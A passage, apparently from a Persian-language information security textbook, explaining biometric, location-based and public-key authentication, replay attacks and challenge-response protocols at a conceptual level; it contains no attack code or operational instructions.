‫ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻭ ﻣﺰﻳﺖ ﻭﺍﺿﺢ ﺩﺍﺭﺩ‪ .‬ﺁﻧﻬﺎ ﻓﺮﺍﻣﻮﺵ ﻭ ﻳﺎ ﮔﻢ ﻧﻤﻲﺷـﻮﻧﺪ‪،‬‬
‫ﻭ ﺑﺮﺍﺣﺘﻲ ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻦ‪ ،‬ﻛﭙﻲﺑﺮﺩﺍﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﻭﻟﻲ ﺍﻧﺘﻘﺎﻝ ﺗﻜﻨﻮﻟﻮﮊﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎ ﺑﻪ ﺳﻄﺢ‬
‫ﺑﺎﺯﺍﺭ ﻣﺸﻜﻞ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ‪) False Positive‬ﺍﺷـﺘﺒﺎﻩ ﻣﺜﺒـﺖ( ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ ﺳﻴـﺴﺘﻢ‬
‫ﺗﻄﺒﻴﻘﻲ ﺭﺍ ﻛﻪ ﻧﺒﺎﻳﺪ ﺍﻋﻼﻡ ﻛﻨﺪ‪ ،‬ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ‪) False Negative‬ﺍﺷﺘﺒﺎﻩ ﻣﻨﻔﻲ( ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ‬
‫ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﻭ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻫﺴﺘﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻳﻚ ﺷﺨﺺ ﻭﺍﺣﺪ ﻣﻲﺑﺎﺷـﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﻛـﺎﻫﺶ ﺍﻣﻜـﺎﻥ ﺗﻄﺒﻴﻘﻬـﺎﻱ‬
‫ﻻ ﺍﺯ‬
‫ﺍﺷﺘﺒﺎﻩ‪ ،‬ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ‪ ،‬ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﺎ ﻧﺸﺎﻥ ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣﻌﻤـﻮ ﹰ‬
‫ﻛﺎﺭﺑﺮ ﺧﻮﺍﺳﺘﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﻳﻚ ﻛﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﻔﻲ ﻣﺜﻞ ‪ PIN‬ﺭﺍ ﺗﺎﻳﭗ ﻛﻨﺪ ﻭ ﺳﭙﺲ ﻳﻚ ﻧﻤﻮﻧﺔ ﺑﻴـﻮﻣﺘﺮﻳﻜﻲ‪ ،‬ﻣﺜـﻞ ﺣﺎﻟـﺖ ﺻـﺪﺍﻳﺶ ﺭﺍ‬
‫ﺍﺭﺍﺋﻪ ﺩﻫﺪ‪ .‬ﺳﻴﺴﺘﻢ ﺍﺯ ﺁﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﻳﻚ ﭘﺮﻭﻧﺪﺓ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﺍﻟﮕﻮﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ‬
‫ﻣﻘﺎﻳﺴﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ‪ -‬ﺑﺠﺎﻱ ﺗﻤﺎﻡ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ‪ -‬ﺑـﺎ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﻣﻘـﺎﺩﻳﺮ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﺪ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺘﻨﺪ؛ ﭼﺮﺍﮐﻪ‪:‬‬
‫• ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﺨﺺ ﺑﺨﻮﺍﻫﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ‪ ،‬ﻣﺸﺨﺼﺎﺕ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻭﻱ ﺑﺎﻳﺪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛‬
‫• ﺍﮔﺮ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺑﻲﺍﺭﺯﺵ ﺧﻮﺍﻫﺪ ﺷﺪ؛ ﻭ‬
‫• ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺑﻄﻮﺭ ﺧﺎﺹ ﺣﻔﺎﻇﺖ ﻧﺸﻮﺩ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﻧﺴﺒﺖ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺗﺤﺮﻳﻒ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺩﺯﺩ ﺑﺎﻫﻮﺵ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺻـﺪﺍ‪ ،‬ﺑﺘﻮﺍﻧـﺪ ﺑـﺎ ﺿـﺒﻂ ﻛـﺮﺩﻥ ﺻـﺪﺍﻱ‬
‫ﺷﺨﺺ ﻣﺠﺎﺯ )ﻭﻗﺘﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﮔﻮﻳـﺪ(‪ ،‬ﺑﺎﺯ ﮔﺮﺩﺍﻧﺪﻥ ﻧﻮﺍﺭ ﺑﻪ ﻋﻘﺐ‪ ،‬ﻭ ﺳﭙﺲ ﭘﺨﺶ ﻣﺠﺪﺩ ﺻﺪﺍﻱ ﺿﺒﻂ ﺷـﺪﻩ‪ ،‬ﺁﻥ ﺳﻴـﺴﺘﻢ ﺭﺍ‬
‫ﻓﺮﻳﺐ ﺩﻫﺪ‪.‬‬

‫ﻣﻜﺎﻥ‪ :‬ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻳﺪ‬


‫ﺑﺎ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺼﻮﺭﺗﻴﻜﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺤﻞ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﻣﻌـﻴﻦ ﻛﻨﻨـﺪ‪ ،‬ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﻘﺮﺍﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﻗﻌﻴﺖ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﺳﻴﺴﺘﻢ ﻣﻮﻗﻌﻴﺖﻳﺎﺏ ﺟﻬﺎﻧﻲ )‪ ١٢٩(GPS‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﻞ‬
‫ﻻ ﺩﺭ ﺍﺗﺎﻗﻬـﺎﻱ ﺩﺭﺑـﺴﺘﻪ ﻛـﺎﺭ‬ ‫ﺑﻜﺎﺭ ﺭﻭﺩ‪ ،‬ﺍﻣﺎ ﺩﻭ ﻣﺎﻧﻊ ﺟﺪﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ GPS‬ﺩﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﻳﻜـﻲ ﺍﻳﻨﻜـﻪ ‪ GPS‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﻤﻲﻛﻨﺪ‪ ،‬ﻭ ﺩﻳﮕﺮ ﺍﻳﻨﻜﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺍﻳﻤﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻜﺎﻧﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ‪ GPS‬ﺑﻪ ﺳﺮﻭﻳﺲ ﺭﺍﻩ ﺩﻭﺭ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺻﺤﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻳﻚ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻣﻮﻗﻌﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻣﻜـﺎﻧﻲ‬
‫)ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﻗﻌﻴـﺖ( ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﻌﻀﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﺗﻠﻔﻦ ﻣﻮﺑﺎﻳﻞ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻜـﺎﻥ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺗـﺸﺨﻴﺺ‬
‫ﺩﻫﺪ ﻭ ﺳﭙﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻣﺮﻛﺰ ﺧﺪﻣﺎﺕ ﮔﺰﺍﺭﺵ ﻛﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﺍﻣﻜﺎﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ‪.‬‬

‫‪129 Geographical Positioning System‬‬


‫‪٣١٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻳﻚ ﺷﻜﻞ ﺳﺎﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻣﺤﻞ‪ ،‬ﺩﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻳﺎﻧﺔ ﻣﺨﺼﻮﺻﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻳﻚ ﻋﻤـﻞ ﺧـﺎﺹ ﺑﺎﺷـﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺍﺯ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻣﺤﺮﻭﻡ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ‪" ،‬ﻣﻮﻗﻌﻴﺖ" ﻫﻨﻮﺯ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﻧﺮﻓﺘﻪ ﺍﺳﺖ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ‬


‫ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﻫﻤﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﻣﺸﺘﺮﻙ ﻫﺴﺘﻨﺪ‪ :‬ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻳـﻚ ﻓـﺮﺩ‬
‫ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺁﻥ ﺷﺨﺺ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺨﺼﻲ ﻛﻪ ﻋﻤﻠﻴﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺣﺎﺿﺮ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺁﻥ ﺷﺨﺺ‬
‫ﺣﺎﺿﺮ ﻧﺒﺎﺷﺪ ‪ -‬ﺍﮔﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺑﻮﺳﻴﻠﻪ ﺗﻠﻔﻦ‪ ،‬ﻓﺎﻛﺲ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ‪ -‬ﺑﺪﻟﻴﻞ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ "ﺣﻤﻼﺕ ﺗﻜﺮﺍﺭ"‪ ،‬ﺍﺣﺘﻤـﺎﻝ‬
‫ﺗﺤﺮﻳﻒ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳﺖ‪.‬‬
‫ﻣﻮﻗﻌﻴﺘﻲ ﺭﺍ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻋﻤﻠﻴﺎﺕ ﺍﺭﺯﻳﺎﺑﻲ ﺻﺤﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﺪ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺛﺮ ﺍﻧﮕـﺸﺖ ﺭﺍ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺍﺯ ﺭﻭﻱ ﺷـﺒﻜﻪ ﻣﻨﺘﻘـﻞ ﻣـﻲﺷـﻮﺩ ﺑـﺪﺯﺩﺩ‪.‬‬
‫ﻫﻤﻴﻨﻜﻪ ﻣﻬﺎﺟﻢ ﺍﻧﺘﻘﺎﻝ ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻌﻞ ﻫﻮﻳﺖ ﻗﺮﺑﺎﻧﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ‬
‫ﺣﻤﻠﻪﻫﺎﻱ ﺗﻜﺮﺍﺭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﺗﻬﺪﻳﺪ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺸﺨﻴﺺ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪.‬‬
‫ﮔﻔﺘﻴﻢ ﻛﻪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺣﻤﻼﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗـﺸﺨﻴﺺ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻀﺎ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺁﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﭼـﻮﻥ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ‬
‫ﻣﺎﻟﻜﻴﺖ ﺷﺨﺼﻲ ﻛﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﺩ ﺧﺎﺭﺝ ﻧﻤﻲﮔﺮﺩﺩ ‪ -‬ﻭ ﻟﺬﺍ ﻫﻴﭽﮕﺎﻩ ﺭﻭﻱ ﺳﻴﻢ ﻓﺮﺳﺘﺎﺩﻩ ﻧﻤﻲﺷﻮﺩ ‪ -‬ﻫـﻴﭻ ﻓﺮﺻـﺘﻲ ﺑـﺮﺍﻱ ﻣﻬـﺎﺟﻢ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺷﻮﻡ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻫﻢ ﺑـﺼﻮﺭﺕ ‪ online‬ﻭ ﻫـﻢ ﺑـﺼﻮﺭﺕ ‪ offline‬ﺑﻜـﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﺣﺎﻟـﺖ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺑﺼﻮﺭﺕ ‪ ،offline‬ﻛﺎﺭﺑﺮ ﻳﻚ ﭘﻴﺎﻡ ﺍﻣﻀﺎﺷﺪﺓ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺻﺤﺖ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﺩ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ‪ ،online‬ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ‪ ١٣٠‬ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺷﻮﺩ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﻳـﻚ‬
‫ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜﻪ‪ ١٣١‬ﮐﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺁﻧـﺮﺍ ﺑـﺼﻮﺭﺕ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﻀﺎ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ‪ ،‬ﻭ ﻳﺎ ﺩﺭ ﻳـﻚ ﺭﻭﺵ ﺩﻳﮕـﺮ‪ ،‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻛـﺎﺭﺑﺮ ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜـﻪ ﺭﺍ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺍﺩﺓ ﻣﺒﺎﺣﺜﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ‪ ،‬ﻛـﻪ ﺑـﺎ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻭ ﺑـﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺁﻥ ﺑـﺼﻮﺭﺕ‬
‫ﺭﻣﺰﺷﺪﻩ ﺑﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻮﻳﺖ ﺍﻭ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳـﺎﻧﺪ‪ .‬ﺑـﺪﻟﻴﻞ ﭘﺮﻭﺗﻜـﻞ ﻣﺒﺎﺣﺜـﻪ ‪ -‬ﭘﺎﺳـﺦ‪ ،‬ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫‪ online‬ﻧﺴﺒﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ offline‬ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ‬


‫ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﻓﺮﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ ،‬ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﻣﻲﺍﻓﺘﺪ ﺩﻗﻴﻘﹰﺎ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﻧﻴﺴﺖ‪ .‬ﻗﺎﺩﺭ ﺑﻮﺩﻥ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﺍﻣﻀﺎﻱ ﻣﻌﺘﺒﺮ ﺍﺛﺒﺎﺕ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺷﺨﺺ ﺧﺎﺹ ﻫﺴﺘﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧـﺎﺹ ﺩﺭ ﻣﺎﻟﻜﻴـﺖ‬
